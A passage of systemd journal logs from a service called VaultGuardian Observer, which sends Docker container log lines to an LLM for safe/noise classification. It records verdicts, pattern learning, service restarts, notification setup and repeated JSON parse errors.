web/app logs via access logger)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:00.744485 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:42:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:00.744522 [analyzer] Source hint mismatch: LLM says "docker container reverse-proxy / application HTTP server (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:03.799777 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:42:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:03.799816 [analyzer] Source hint mismatch: LLM says "docker containerized web API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:06.164383 [observer] Pipeline: processed=863 pattern_hits=473 llm_calls=389 llm_errors=6 learned=1 Mar 19 22:42:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:06.164422 [observer] Patterns: hash=473 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=1 misses=390 Mar 19 22:42:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:06.790206 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:42:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:06.790241 [analyzer] Source hint mismatch: LLM says "docker container web/api access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:09.812584 [analyzer] LLM verdict for 
docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:42:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:09.812624 [analyzer] Source hint mismatch: LLM says "docker/captain (web service proxy or app request logger)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:12.730054 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:42:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:12.730102 [analyzer] Source hint mismatch: LLM says "docker http access logger (app API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:15.709928 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:42:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:15.709964 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:21.986911 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:42:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:21.986957 [analyzer] Source hint mismatch: LLM says "docker container access log (web service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:24.527332 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix 
Mar 19 22:42:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:24.527365 [analyzer] Source hint mismatch: LLM says "docker/captain (likely container access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:25.668153 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=contains Mar 19 22:42:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:25.668216 [analyzer] Source hint mismatch: LLM says "docker (app access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:27.750205 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:42:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:27.750246 [analyzer] Source hint mismatch: LLM says "docker/container web API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:30.741519 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix Mar 19 22:42:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:30.741555 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain) HTTP access logging", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:31 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:31.452951 [observer] Shutting down... Mar 19 22:42:31 ip-172-26-12-110 systemd[1]: Stopping VaultGuardian Observer... 
Mar 19 22:42:31 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:31.458451 [observer] Final stats: processed=885 pattern_hits=487 llm_calls=397 learned=1 Mar 19 22:42:31 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:42:31.458474 [observer] Shutdown complete Mar 19 22:42:31 ip-172-26-12-110 systemd[1]: observer.service: Deactivated successfully. Mar 19 22:42:31 ip-172-26-12-110 systemd[1]: Stopped VaultGuardian Observer. Mar 19 22:42:31 ip-172-26-12-110 systemd[1]: Started VaultGuardian Observer. Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.472637 [observer] VaultGuardian Observer starting... Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.472986 [observer] Normalizer registry initialized Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477008 [observer] Pattern store initialized (4 scopes) Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477028 [observer] Analyzer pipeline ready Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477125 [notifier] Generated default config at /var/lib/observer/notifications.yaml Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477393 [logwatch] Notifications: Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477405 [logwatch] ✗ webhook → not configured (set WEBHOOK_URL) Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477410 [logwatch] ✗ email → not configured (set RESEND_API_KEY + ALERT_EMAIL_TO) Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477414 [logwatch] ✗ sms → not configured (set TWILIO_SID + ALERT_SMS_TO) Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477417 [logwatch] ✗ push/ios → not configured (set APNS_KEY_PATH + APNS_DEVICE_TOKEN) Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477420 [logwatch] ✗ push/fcm → not configured (set FCM_CREDENTIALS_PATH + 
FCM_DEVICE_TOKEN) Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477423 [observer] No notification channels configured — alerts will be logged to stdout only Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.477697 [observer] Starting container log watcher... Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482373 [watcher] Found 8 running containers Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482403 [watcher] Streaming logs for srv-captain--login.1.z0hqzqv52lp5zsxguujh9vvsp (0fd7725d4d5c) Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482540 [watcher] Streaming logs for srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp (e9fbb6ab33ae) Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482609 [watcher] Streaming logs for captain-certbot.1.by454lfepw5mkzfa8e3karl8p (e1aa25883517) Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482612 [watcher] Streaming logs for captain-netdata-container (974270844dff) Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482687 [watcher] Streaming logs for captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo (9d722e5b66d0) Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482771 [watcher] Streaming logs for srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf (73fec0bbd4c4) Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482784 [watcher] Streaming logs for captain-captain.1.oqvny8g95v3neveijmxdmdgto (080568bcaf31) Mar 19 22:42:31 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:31.482863 [watcher] Streaming logs for srv-captain--media.1.td1ofal2g3beoqwzjiemvmuo4 (91c0395873e8) Mar 19 22:42:32 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:32.060530 [observer] LLM inference server connected Mar 19 22:42:33 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:33.993214 [analyzer] LLM verdict for 
docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:42:33 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:33.993261 [analyzer] Source hint mismatch: LLM says "dockerized web/app access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:36 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:36.749600 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:42:36 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:36.749640 [analyzer] Confidence 0.82 too low for pattern learning (need 0.85+) Mar 19 22:42:42 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:42.854316 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:42:42 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:42.854351 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+) Mar 19 22:42:45 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:45.894521 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.42 action=suppress pattern_type=prefix Mar 19 22:42:45 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:45.894557 [analyzer] Confidence 0.42 too low for pattern learning (need 0.85+) Mar 19 22:42:48 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:48.758768 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:42:48 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:48.758801 [analyzer] Source hint mismatch: LLM says "docker (containerized web/API service access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:51 ip-172-26-12-110 
observer[1562454]: 2026/03/19 22:42:51.922852 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.76 action=allow pattern_type=prefix Mar 19 22:42:51 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:51.922887 [analyzer] Source hint mismatch: LLM says "docker (application HTTP access log for logs endpoint)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:42:54 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:54.742643 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:42:54 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:54.742680 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+) Mar 19 22:42:58 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:58.013847 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:42:58 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:42:58.013882 [analyzer] Learned prefix pattern for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto [allow]: "GET /api/v2/user/apps/appData/api/logs?encoding=hex" Mar 19 22:43:00 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:00.880840 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:43:00 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:00.880877 [analyzer] Source hint mismatch: LLM says "docker container access logger / app HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:43:01 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:01.489252 [observer] Pipeline: processed=22 pattern_hits=13 llm_calls=9 llm_errors=0 learned=1 Mar 19 22:43:01 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:01.489277 
[observer] Patterns: hash=13 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=9 Mar 19 22:43:03 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:03.821515 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix Mar 19 22:43:03 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:03.821550 [analyzer] Source hint mismatch: LLM says "docker/container web access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:43:06 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:06.865481 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix Mar 19 22:43:06 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:06.865523 [analyzer] Source hint mismatch: LLM says "docker container access log / web API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:43:09 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:09.684813 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=contains Mar 19 22:43:09 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:09.684853 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+) Mar 19 22:43:12 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:12.748517 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:43:12 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:12.748556 [analyzer] Source hint mismatch: LLM says "docker (container web/app proxy access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:43:15 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:15.159381 [observer] Shutting down... 
Mar 19 22:43:15 ip-172-26-12-110 systemd[1]: Stopping VaultGuardian Observer... Mar 19 22:43:15 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:15.166537 [observer] Final stats: processed=34 pattern_hits=21 llm_calls=13 learned=1 Mar 19 22:43:15 ip-172-26-12-110 observer[1562454]: 2026/03/19 22:43:15.166562 [observer] Shutdown complete Mar 19 22:43:15 ip-172-26-12-110 systemd[1]: observer.service: Deactivated successfully. Mar 19 22:43:15 ip-172-26-12-110 systemd[1]: Stopped VaultGuardian Observer. Mar 19 22:43:15 ip-172-26-12-110 systemd[1]: Started VaultGuardian Observer. Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.182055 [observer] VaultGuardian Observer starting... Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.182099 [observer] Normalizer registry initialized Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187264 [observer] Pattern store initialized (4 scopes) Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187283 [observer] Analyzer pipeline ready Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187512 [logwatch] Notifications: Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187519 [logwatch] ✗ webhook → not configured (set WEBHOOK_URL) Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187524 [logwatch] ✓ email → drew@vaultdec.com Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187528 [logwatch] ✗ sms → not configured (set TWILIO_SID + ALERT_SMS_TO) Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187531 [logwatch] ✗ push/ios → not configured (set APNS_KEY_PATH + APNS_DEVICE_TOKEN) Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187534 [logwatch] ✗ push/fcm → not configured (set FCM_CREDENTIALS_PATH + FCM_DEVICE_TOKEN) Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.187690 [observer] Starting 
container log watcher... Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.192499 [watcher] Found 8 running containers Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.192636 [watcher] Streaming logs for srv-captain--login.1.z0hqzqv52lp5zsxguujh9vvsp (0fd7725d4d5c) Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.192880 [watcher] Streaming logs for srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp (e9fbb6ab33ae) Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.192957 [watcher] Streaming logs for captain-certbot.1.by454lfepw5mkzfa8e3karl8p (e1aa25883517) Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.193069 [watcher] Streaming logs for captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo (9d722e5b66d0) Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.193143 [watcher] Streaming logs for srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf (73fec0bbd4c4) Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.193233 [watcher] Streaming logs for captain-captain.1.oqvny8g95v3neveijmxdmdgto (080568bcaf31) Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.193302 [watcher] Streaming logs for srv-captain--media.1.td1ofal2g3beoqwzjiemvmuo4 (91c0395873e8) Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.193429 [watcher] Streaming logs for captain-netdata-container (974270844dff) Mar 19 22:43:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:15.692864 [observer] LLM inference server connected Mar 19 22:43:27 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:27.410515 [llm] Failed to parse verdict from: Mar 19 22:43:27 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:27.410565 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:43:27 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:27.410577 [LLM_ERROR] 
Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:17.596618845Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:43:36 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:36.468587 [llm] Failed to parse verdict from: Mar 19 22:43:36 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:36.468624 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:43:36 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:36.468633 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:20.610612677Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:43:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:45.192573 [observer] Pipeline: processed=16 pattern_hits=13 llm_calls=3 llm_errors=2 learned=0 Mar 19 22:43:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:45.192600 [observer] Patterns: hash=13 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=3 Mar 19 22:43:50 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:50.092315 [llm] Failed to parse verdict from: Mar 19 22:43:50 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:50.092354 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:43:50 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:50.092363 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:23.584043667Z GET /api/v2/user/apps/appData/api 304 2.453 ms - - Mar 19 22:43:59 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:59.489215 [llm] Failed to parse verdict from: Mar 19 22:43:59 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:59.489248 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:43:59 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:43:59.489258 
[LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:23.605803170Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:44:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:09.102136 [llm] Failed to parse verdict from: Mar 19 22:44:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:09.102210 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:44:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:09.102220 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:29.596302892Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:44:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:15.192314 [observer] Pipeline: processed=33 pattern_hits=27 llm_calls=6 llm_errors=5 learned=0 Mar 19 22:44:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:15.192338 [observer] Patterns: hash=27 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6 Mar 19 22:44:18 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:18.695866 [llm] Failed to parse verdict from: Mar 19 22:44:18 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:18.695903 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:44:18 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:18.695911 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:32.596792617Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... 
Mar 19 22:44:27 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:27.129215 [llm] Failed to parse verdict from: Mar 19 22:44:27 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:27.129252 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:44:27 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:27.129262 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:35.600308545Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:44:34 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:34.983567 [llm] Failed to parse verdict from: Mar 19 22:44:34 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:34.983599 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:44:34 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:34.983606 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:44:24.868600818Z 205.210.31.27 - - [19/Mar/2026:22:44:24 +0000] "54.200.221.0" "GET / ... Mar 19 22:44:38 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:38.304024 [llm] Failed to parse verdict from: Mar 19 22:44:38 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:38.304060 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:44:38 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:38.304069 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:38.597970848Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... 
Mar 19 22:44:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:45.193923 [observer] Pipeline: processed=53 pattern_hits=40 llm_calls=11 llm_errors=9 learned=0 Mar 19 22:44:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:45.193949 [observer] Patterns: hash=40 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=13 Mar 19 22:44:47 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:47.047626 [llm] Failed to parse verdict from: Mar 19 22:44:47 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:47.047672 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:44:47 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:47.047682 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:44.603607287Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:44:48 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:48.647810 [llm] Failed to parse verdict from: Mar 19 22:44:48 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:48.647861 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:44:48 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:48.647870 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:44:41.593271404Z 98.152.173.124 - - [19/Mar/2026:22:44:41 +0000] "api.admin.kovicloud.... 
Mar 19 22:44:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:56.016230 [llm] Failed to parse verdict from: Mar 19 22:44:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:56.016266 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:44:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:56.016275 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:47.603359544Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:44:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:56.673809 [llm] Failed to parse verdict from: Mar 19 22:44:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:56.673844 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:44:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:44:56.673853 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:44:45.091324681Z 98.152.173.124 